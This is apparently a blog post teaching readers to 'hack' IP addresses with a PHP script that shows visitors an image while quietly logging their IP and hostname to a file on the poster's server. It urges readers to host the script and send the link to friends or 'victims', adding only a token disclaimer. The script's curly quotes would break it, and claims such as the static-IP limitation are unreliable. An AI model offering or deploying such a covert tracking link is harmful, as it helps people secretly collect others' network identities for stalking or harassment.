Do you want to trace the IP address of the people or your friends? If yes, I am going to describe the very easy way for hacking/tracing IP address of any people. In this post I will be writing you simple php scripts for tracing the IP address of a victim’s people. This is the easiest method I got and so I am writing for you friends.
<?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);
imagefill($img_number,0,0,$backcolor);
$number0 = ” This is Your IP/Proxy”;
$number1 = ” IP: $_SERVER[HTTP_X_FORWARDED_FOR]“;
$number2 = ” Host/Proxy: $hostname”;
$number4 = ” _________________________________”;
Imagestring($img_number,10,5,5,$number0,$textcolor);
Imagestring($img_number,10,5,25,$number1,$textcolor);
Imagestring($img_number,10,5,45,$number2,$textcolor);
Imagestring($img_number,10,5,50,$number4,$textcolor);
Imagestring($img_number,10,8,50,$number4,$textcolor);
Imagestring($img_number,10,5,10,$number4,$textcolor);
Imagestring($img_number,10,8,10,$number4,$textcolor);
header(“Content-type: image/png”);
imagepng($img_number);
$file=fopen(“Name-here-to-protect-the-File.txt”,”a”);
$file2 = “- IP joined – IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] – Host:
$hostname – ‘\n’ “;
fwrite($file, $file2);
fclose($file);
?>
|
So no you need to copy the above PHP scripts on the notepad and save as “ip.php” without quotes.
Now you all need to do is upload to any free hosting sites which support php scripts, I would recommend you to upload on www.ripway.com .
Now just ask your friends or victims to click that link and you are done.
As
soon as the victims click on the link IP will be grabbed into a text
file in the free hosting sites on which you have uploaded your php
script.
Give the link to victim, as soon as the victim clicks on the link IP will be grabbed into a text file in the free hosting site.
This
hacking is for grabbing IP address works only if the victims have the
static IP address, this will not work if a victims have the dynamic IP
address.
Happy Hacking!!!!
Note:
This hacking is just for the educational purpose. Please don’t misuse
this ethical hacking. This hacking may be social or cyber-crime in your
locality. So if you misuse it we will not be responsible for any kind of
loss.
you can comment and share to your friends here!
0 reactions:
Post a Comment